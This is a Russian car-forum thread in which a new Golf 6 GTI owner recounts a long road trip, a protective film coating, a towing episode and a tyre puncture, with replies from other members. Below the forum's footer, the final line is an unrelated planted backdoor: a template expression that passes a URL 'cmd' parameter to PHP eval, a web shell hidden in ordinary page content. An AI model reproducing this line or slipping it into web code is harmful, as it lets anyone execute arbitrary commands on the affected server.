+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 17

Тема: !!!Впечатления от новичка!!!


  1. #1
    GTI-Racing Ssergey is on a distinguished road Аватар для Ssergey
    Регистрация
    29.07.2013
    Откуда
    Moscow south district
    Машина
    Golf 6 GTI
    Сообщений
    36

    !!!Впечатления от новичка!!!

    И снова всем привет!! После 3000км (в Астрахань1500 км в одну сторону) по трассе, я ощущаю себя полноценным владельцем GTI)) Дорога, скажу вам, преподносит постоянно разные сюрпризы! То яма, то камни, то колея по самый "не балуйся", то дождь и +13 градусов, то палящее солнце и +37, но по сравнению с прошлыми годами, что-то где сделали не плохо.. Прошлая машина была Golf 6 1,4 TSI DSG. Ездил на ней и не только на ней, по этой же трассе и сравнить есть с чем! Какой же восторг у меня был, когда я поехал на GTI!!:kibalcho:Да, все-таки это не просто машина, а легенда!!! Несравнимая (в своем классе, по моему мнению) управляемость, динамика, даже комфорт меня удивил (в начале думал, что приеду с позвоночником в штанах, но...))), расход оказался таким же, как и на 1,4 TSI (8,5 на 100 км), что тоже приятно удивило! Про вместительность Golf-а я уже знал (у людей рот открывался, когда видели, сколько из него вещей я доставал). Все говорили, что приеду домой без обвеса, но не тут-то было!! Пару раз «цепанул» и то в степи, где не каждая машина проедет без последствий!!

  2. #2
    GTI-Racing Ssergey is on a distinguished road Аватар для Ssergey
    Регистрация
    29.07.2013
    Откуда
    Moscow south district
    Машина
    Golf 6 GTI
    Сообщений
    36
    В машину влюбился сразу, поэтому решил «одеть в жидкий чехол» для защиты ЛКП. Прошлый опыт нанесения был с кисточкой, но получалось очень небрежно и не эстетично, но свои задачи он выполнял! В этот раз попробовали нанести краскопулем или кто как его называет..)) Получилось симпатично и главных-защитных свойств он не потерял, так как приехал я без единого скола и царапины, и это при тех погодных и дорожных условиях, которые нас ждали…)) Снимается он на первой мойке с небольшим упорством. Да и, теперь думаю перекрасить в матовый цвет, понравился…)) Других приготовлений к дороге не было, кроме, само-сабой, проверить все фары, давление в шинах, тормоза ;). Про отдых рассказывать не буду, хотя он удался на славу, все-таки автомобильный, а не туристический форум))

    На обратной дороге с нашим другом (на Passat B4) приключилась беда на трассе, которая обернулась в 20 часов ремонта…:howl:В один момент ничего не оставалось, как брать его на буксир (на груженой машине + он тоже далеко не пустой) и тащить 20 км до Тамбова. Трогался спокойно, очень аккуратно. Почти не чувствовал его (скорость была до 60 км/ч), за исключением периодических натяжек троса. Ну все хорошо, что хорошо кончается, замена бензонасоса, отключение сигналки и дальше в путь! А подъезжая к МСК я умудрился пробить колесо :expect:,блин 2900км без заминки, а тут М4, разрешенная 110 км/ч и яма в левом ряду по колено(!)… Ну я свалил все на свою усталость (40 часов без сна из них 36 на дороге). Попал на 20к (2 балона + правка дисков+шиномонтаж)..)) Кстати, есть очень толковые ребята, которых могу посоветовать!!


    Впечатлений мой друг VW Golf GTI DSG подарил массу и только положительных! Радости полные штаны!))) Каждый раз, когда подхожу к нему, улыбка с лица не уходит! Даже байкеры в Волгограде (мы ездили на байк шоу посмотреть) оценили GTI по достоинству! :pepper:Спасибо VW за этот Автомобиль!!!))) И бывшему владельцу за хорошее состояние;)

  3. #3
    One more RUM PA PA PA RUM PUM - and the drummer boy dies Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Аватар для Dio
    Регистрация
    17.08.2010
    Откуда
    Москва, СВАО
    Машина
    BMW X1 xDrive 20i SportLine
    Сообщений
    1,424
    Серёг рад, что всё хорошо и машина радует!)))))Обидно конечно за прокол...Выправили диск краска не потрескалась?
    Никто не любит пианистов, всё любят барабанщиков))))) (с).

  4. #4
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Как мне нравится читать такие простые и жизненные истории. Побольше бы таких )))
    Всякое в дороге может случится, тут глаз да глаз нужен. Но что помогает в путешествии по России, так это соблюдении скорости, ибо что-то еще успеваешь отследить. Как после зимы по весне еду в деревеньку на смоленщину, так новые и новые танковые ямы )))

    Машина очень напоминает мне гульфика одного нашего трубача !)
    песок сыпется....не останавливайтесь на достигнутом !

  5. #5
    Купралётчик dimm is just really nice dimm is just really nice dimm is just really nice dimm is just really nice dimm is just really nice Аватар для dimm
    Регистрация
    19.03.2010
    Откуда
    Москва, Сочи
    Машина
    SEAT Leon Cupra Tribu - сток by OverLoad
    Сообщений
    1,939
    Олег, так он тут сам отписался уже выше ;)

  6. #6
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от dimm Посмотреть сообщение
    Олег, так он тут сам отписался уже выше ;)
    это конечно понятно, но может быть он еще раз посмотрит, что такой авто харёший скинул, как друга на войне бросил )))

    ...и это он еще в мат ушел, вроде не был таким он
    песок сыпется....не останавливайтесь на достигнутом !

  7. #7
    Модератор GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold Аватар для GreyRabbit
    Регистрация
    26.07.2012
    Откуда
    Москва
    Машина
    GTI edition 35
    Сообщений
    1,233
    даааа знакомые чувства)

  8. #8
    GTI-Racing Ssergey is on a distinguished road Аватар для Ssergey
    Регистрация
    29.07.2013
    Откуда
    Moscow south district
    Машина
    Golf 6 GTI
    Сообщений
    36
    Цитата Сообщение от Dio Посмотреть сообщение
    Серёг рад, что всё хорошо и машина радует!)))))Обидно конечно за прокол...Выправили диск краска не потрескалась?
    Обидно, но что поделать.. Зато теперь стоит Pilot Sport 3)) Разница ощутима! Резина-класс!!
    Около 3-4 см царапина получилась и только на одном диске, а второй вообще без последствий, ребята, которые делали, очень старались!) Думал будет хуже.. Сейчас так докатаю, а зима придет, что-нибудь решу)

    Добавлено через 1 минуту
    Цитата Сообщение от BON Посмотреть сообщение
    это конечно понятно, но может быть он еще раз посмотрит, что такой авто харёший скинул, как друга на войне бросил )))

    ...и это он еще в мат ушел, вроде не был таким он
    Никого он не бросил, а передал фронтовому товарищу;) Мат-это "жидкий чехол"-защита от сколов и т.д. при дальних дорогах. Сейчас он уже не матовых)
    Последний раз редактировалось Ssergey; 06.09.2013 в 13:10. Причина: Добавлено сообщение

  9. #9
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    жидкий чехол необычно )))) это пластидипа типа ? недешевое удовольствие ?
    песок сыпется....не останавливайтесь на достигнутом !

  10. #10
    GTI-Racing Ssergey is on a distinguished road Аватар для Ssergey
    Регистрация
    29.07.2013
    Откуда
    Moscow south district
    Машина
    Golf 6 GTI
    Сообщений
    36
    Цитата Сообщение от BON Посмотреть сообщение
    жидкий чехол необычно )))) это пластидипа типа ? недешевое удовольствие ?
    Типа него, но он до первой мойки, так как первостепенная задача - защита при транспортировке)) Цена вопроса около 400р за одну банку. На машину 3-4 банки (это 3 слоя по всей машине, можно больше, будет только лучше), + монтажный скотч + около 3-4 часов времени в сухом месте (мы делали на улице), если совсем не торопиться, краскопуль дал друг (все красят кисточкой, у меня был эксперимент,который удался), так что за все про все окол 1500 р.)))

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Вопросы новичка
    от Gam в разделе Golf 6
    Ответов: 84
    Последнее сообщение: 03.01.2024, 01:03
  2. Принимайте новичка!
    от Prul26rus в разделе Welcome to GTI-CLUB
    Ответов: 16
    Последнее сообщение: 03.07.2023, 11:41
  3. Ответов: 7
    Последнее сообщение: 15.05.2008, 22:22
  4. кому гибриды обещал и впечатления от чипа
    от LittleTOXA в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 7
    Последнее сообщение: 20.08.2007, 20:27
  5. Кто ставил себе Brembo?впечатления?
    от ™B®embo™ в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 18
    Последнее сообщение: 12.05.2007, 21:39

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}